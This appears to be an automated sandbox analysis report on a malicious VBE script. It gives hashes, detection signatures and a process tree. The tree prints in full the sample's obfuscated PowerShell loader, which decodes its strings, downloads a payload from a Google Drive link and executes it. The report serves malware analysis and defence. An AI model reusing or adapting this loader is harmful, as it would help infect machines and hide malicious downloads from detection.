Analysis
-
max time kernel
147s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
19-04-2024 01:12
Static task
static1
Behavioral task
behavioral1
Sample
364817faf68a4f6da9d49eeb14735537230c35f5bdd6e0a24e13a1f3652f6e19.vbe
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
364817faf68a4f6da9d49eeb14735537230c35f5bdd6e0a24e13a1f3652f6e19.vbe
Resource
win10v2004-20240412-en
General
-
Target
364817faf68a4f6da9d49eeb14735537230c35f5bdd6e0a24e13a1f3652f6e19.vbe
-
Size
206KB
-
MD5
0d7f8e709882acc61cd9366186f1e7d5
-
SHA1
b6fd422590eb87824051092b8c04cb1e58ab4abd
-
SHA256
364817faf68a4f6da9d49eeb14735537230c35f5bdd6e0a24e13a1f3652f6e19
-
SHA512
6a5ca966f086f9b8b6b4c7b2d86ab63d70349c0f227990913f35c7f6fdacb5f86e79133023d2791a3b55328616930a7b6c907e74f2291884a3a68445eb2eaebc
-
SSDEEP
6144:/YBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfAqNl:M2dOxP6o
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 12 1800 powershell.exe 16 1800 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 drive.google.com 12 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1800 powershell.exe 1800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1800 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1440 wrote to memory of 1800 1440 WScript.exe 82 PID 1440 wrote to memory of 1800 1440 WScript.exe 82 PID 1800 wrote to memory of 180 1800 powershell.exe 85 PID 1800 wrote to memory of 180 1800 powershell.exe 85
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\364817faf68a4f6da9d49eeb14735537230c35f5bdd6e0a24e13a1f3652f6e19.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Fjervgtes = 1;$Linieafslutningen='Substrin';$Linieafslutningen+='g';Function Kriminalassistenters($Pauciloquently){$Repronunciation=$Pauciloquently.Length-$Fjervgtes;For($Anies=5; $Anies -lt $Repronunciation; $Anies+=(6)){$Trallens+=$Pauciloquently.$Linieafslutningen.Invoke($Anies, $Fjervgtes);}$Trallens;}function Rundetaarn($Strghandelens){& ($Statsraadssekretrers) ($Strghandelens);}$Strafansvars=Kriminalassistenters 'F,lleMrisleo u,tmz BeariInk tlNethelgryena Foru/Lyste5Elisi.Meste0charm Piete(PhenyWBurboiSlutsnNe.pndC.incoAlbinwlege,sStass vikarNOutflTGaskr Tur.o1Radia0Meta .Super0Infra;Grana Pro.eW,atiri Af anBrudf6Major4Ap ge;Hhfus Snde xquant6Tobo.4 Wool; au.t PorkerMiscovUdgiv:Under1Oseed2Uanme1Antap.Autod0Digon) omme overoGRestaeCollacFas.ik UphooMater/G.men2Ferri0Blttr1Snep.0Bogs,0 Dilu1Hope,0Rumme1Granu .efoaFArbeji KontrA teoeCountfOpretoForpaxLarda/Jo,ab1Gullb2oksek1 illa. .mpr0Agglo ';$Dokumentbehandlings=Kriminalassistenters 'di.scUarkivsOr hoe.arnirInstr-RasteATectugTikaneIrrepnDesyatMisna ';$Vindkrfterne=Kriminalassistenters 'Synsfh .fmat Ntpit re,ypPervasPlens:Start/.iljm/Uorded HyperSovj iMerrivSubc.eForby.Kl,ddgAnkero caraoTigergRo,erlOliehe Takk.SalgscTi,baoFumedmBr,dn/fo,pau BanccTolva?Fall,eHomoexCaryopPrsteoRelayr,lapptCyst =Ceremd indbosvednwBrachnFranklWucheoSalgsaFejltdMoret&EveneiBu.nudTryk =Mumbl1Sa sevV.ndfwGul bgRh.ciIPrimoTfortoH.odtaKTu zl7Theopftv.ngcneedlJMdressSopperBrat a OpsaKb,getW CitrxC.lon6CaterC D,egD StudvMad,mz,vangGLaesnkrumkakN nzoJhaube1hinevvNeuroNEvolvy Tympa Omdbp.rtve ';$Subwarden12=Kriminalassistenters 'Baalt>Grama ';$Statsraadssekretrers=Kriminalassistenters ' unari B steInterxAnnui ';$Artifices = Kriminalassistenters 'EstroeNyn,ecSnkloh B,seoInd,a Bacon%BreesaTjurhp AcropMartidT.ntea,athat VejaaHeksa%Remo.\Edi.oeSa.tev ZootiWraitlUdst whjemmiloesesRe.anhLetfoi .letnRitm.gk mof.L,citFUnpenugipsyn Blom Dous&L xat&Wiene Ulr.eLethacOp nihGalopoKandi G ros$Scr.w ';Rundetaarn (Kriminalassistenters 'Skyll$RejsegAfspilI,gogobattobCryo.aPlasmlM.der: MotoTtape.o MacrkgarnisSkolei SparnDece,eBinderBunomsFla m=rin,e( krubcDmpefm Sandd.eque Stagn/ QuadcFry,l Samm$KontaA ChibrSanyatUnen.iLamyif Mitii .enfcSaniteRodlis Bal )Hiv,e ');Rundetaarn (Kriminalassistenters ',enne$Skri g Mo,hl.elesoCrea bAnknyaBortvlSubas:ProbaVKos.fekarl.l BearyFolkenSaphidirisheM.disrDodec=offic$ErhveVArbeji.tdsinIn.exdegyptkFintmr mil.fPryertGlebaeAggrerhalvanKopm.eJernp.Milkss OrnipVenezlBe chiOsciltPhilo( Ba.t$TechnS Sun uElaidb outnwFejlsaDaglirFunktdSlagpe Ken.n.illb1 Lep,2Di ap)Sourc ');$Vindkrfterne=$Velynder[0];Rundetaarn (Kriminalassistenters ' erie$Udva,gHon rldemonoAlignbSulphaGve.el.inan: ,dviBBrushr Bes.nFordjd rokaeUnderrOr ans DaaslBag peMetacvCandibOilc oFl tseNonfinWiversFolk,= IndfNAzal,eLiniewAvic.-T ribOUdasebdi odjBarete.ndepcFang.t N.nc UnsumSLutriyTonsusPrinttBevaeeTransmCar u.MonomNTampeeSufeitT,ave. EntrW.endaeOvercbDemarCPailllSpilli Ba yeObolenNaaletS.bdi ');Rundetaarn (Kriminalassistenters 'Archd$sonanB CalvrStudenSmidid RegieForivrKo tusQu ntlT.eole Indbv Fib bElvero ResteK mrinTeschsrat,h.Wh,ppHStra,eFinlaaM.rifdSoleneAdhsirtrknisSiben[Appea$SelanDPatruoCol nkEksekuNstkomHi leeVolcanVerittGiroibDa psePleurhCrossaTr mon lagedUpti lGalbliUnconn FoyegBetaksStjer]D.gpe=Mycol$ Be.rSPa vitUnderrFladtaS,ndffTardiaZoefon ForesKa,kavM.lleaKri.ir Stems Deen ');$skraelling=Kriminalassistenters 'OrdniBFilmor N,hen AlpedEthere Bar r preos NonnlRes,se RuddvUrolibUdstao S,oreKartonSnnedsYakok. Au iDTrem.oAfvalw AnlbnOve dld sino .kriaSamtid.elprFLugteiVeinulBa.taeV dlg(Idiom$,rgieVBeklaiSorr nDefibd MixekArb jr BaksfSydsltFeltmeSinapr.astrnAnar,e Tuea,Nonre$ CirkSCand,tArbejvU,pins AlmauTermog kjuleTelltnStempdEn.kkeP,seusDiphy) Tra, ';$skraelling=$Toksiners[1]+$skraelling;$Stvsugendes=$Toksiners[0];Rundetaarn (Kriminalassistenters 'B odl$quercgT ymilmediaoOpspobNuggaaH andl blom:MokkeTStabei Flukl Wriss Un.nmAutofuRum.udfaultsRheineStedftspars= Tatt(RememTGrilleBenzasGrouctGl at- PolyP CemeaVictit.itrehL.ebr medbe$PenttSmoisttHulnivTaksts inieu addigIntete TordnJordld T,yleGavnlsmi.ro)vak e ');while (!$Tilsmudset) {Rundetaarn (Kriminalassistenters 'Almog$Capong IllulBifiloSmd.sbH lvsaUnfrol rod:MeanyWForariSansee,ebrunUnf.le s mirNa,rosLazarnSap oiSpecttSkovtsHa erlNonexeDehydrPara =Cicel$RevoltTownerS.opku Autoe Dagp ') ;Rundetaarn $skraelling;Rundetaarn (Kriminalassistenters 'BehanSV,lgatCircuaReddlr.offrtKampa-Gasm,SKu.ndl SexieMdep.e kammpM.stn Herr4Ef,er ');Rundetaarn (Kriminalassistenters ' M rs$Skel,gTsuchl BilloAdju b,ndkoaunitil Depa: MuleT maskideheplW,yfesSilhum ,veruPrinsd ostrsPotope OvertTerri= M di(DrmmeTAntiteFibrosRajast Con -GennePMithraTakt tJeapohAdver Teori$ReinsSLe sttAggravUnl csHammou PseugKasuse Infen ommedb okee Ham.sHels,) Joa ') ;Rundetaarn (Kriminalassistenters 'Tegni$UnclegEmplal MicroAcertb FinaaSto,ilSpir.:CaddiDHjovneNaadim Muleiskiffu subfrKassegHirciisophicendo aSpor.lOverbl Fe.tyBista=Thack$TrassgApalalforheo MichbRitmeaUnenclIrrup:Kil.tIFilipnTilskvUnaffiAnticg ErytoSubturTerr.aDepertPh,loeHviskstranl+Choca+Scord% Icic$ DiplVUnacteT ksklDis,uyStiffnNomendKrigseShallrGrang.AjugacRep.ioExodyuStopln.injetFolke ') ;$Vindkrfterne=$Velynder[$Demiurgically];}Rundetaarn (Kriminalassistenters ' Fami$DemilgTrykklBevaeoS,rlib,hrasaov.rilSyst,:BkkenS GilenKitt,i ZakarSnor kR.emel Svove O,ivnEd,ebdAkutieInfir hippu=Ukult VerlG AppeeTarm t,etyn-Tj,noCEloxeo T.lsnHieratsv kkeBanisn A vitMono, hami$KnetrShaandt b.sgvOpin,sUnderuVandag ,olseGaragnHalfbd Be rePorchsRigti ');Rundetaarn (Kriminalassistenters 'Armen$Ansvag Expol Tordohu.cabStammaAg.delHypno:TraveHDerane dmindOpfodeVallasLngodt Re.te lersAbi.t Duel =Cocan C,rol[RosarS Trany eadjssyntat .andetelefm Sync.JudicCLammeoB sernArsoiv PaaheCl qurSccmetFremd]Jerna:Deriv:PsyktFstallrMudspoGen.nmD.vinB Cerva Pan sStudeeVanil6Sa.gs4 knopSNonautR conrBlommi FjernElavkgTalle(Myele$ E,alS .nign Overi C.rirU.prekAut dl ForueAarbonPeda,dPrinte Dea,)Diver ');Rundetaarn (Kriminalassistenters 'Regnb$flu kgPennilOverroNavnebZircoa datalKatte:OriolsLanesp temaeEdvarr edism Yecha,ndlat ugemoLinj,cSpillyriflesKiseltMona.iPaakltU.dlaiDextrsDiapi Medic= Stav este[AftosSUnconyfleyesForfotUdskie SingmSte f.KanonTCeruleSlattxPaedot Nede.,lectE hronbairacI dico MicedSemieiIdentnInt rgS nge]Feste: Oven:Me.alAFluxeSR ndsC Po nIRe,atIBow.b.Cul.iG ,gateUnmait iploS PalltKangar HydriBlindnI,dengCaffa( Besv$K.nomHH,pereBisondJubileb.rrisSkakttGennee AutosDehyd)Biga. ');Rundetaarn (Kriminalassistenters 'Disse$ Til gG.undl KondoM.rtybNglefaB,lislSand,:heterRBrostuAmmondxenopePriorkMargeo LitrnU,penvT,emmoHa.rblGhaneuBlaastSlavetSadise De.ar,mneasHaitf1Ho,ct5 .pul6Gift.=Inv.t$antidsTrioepWeaveeY,onfrFestsm ProraStan.t CzecoUniv,cdetenyTmrersSni,etSpa.riChro.t OveriFinansNongu.ShetlsSolsiuSku.ebPropasSer.otUnloorUnde,i Sbr.nAdfrdgEnric( Cl.n3Samle1Super1 Pung2 Stja5Se,st7Polit,Unjew2Camma8 ,ant4 Drag2Skrun7 Mo t) Bere ');Rundetaarn $Rudekonvolutters156;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\evilwishing.Fun && echo $"3⤵PID:180
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82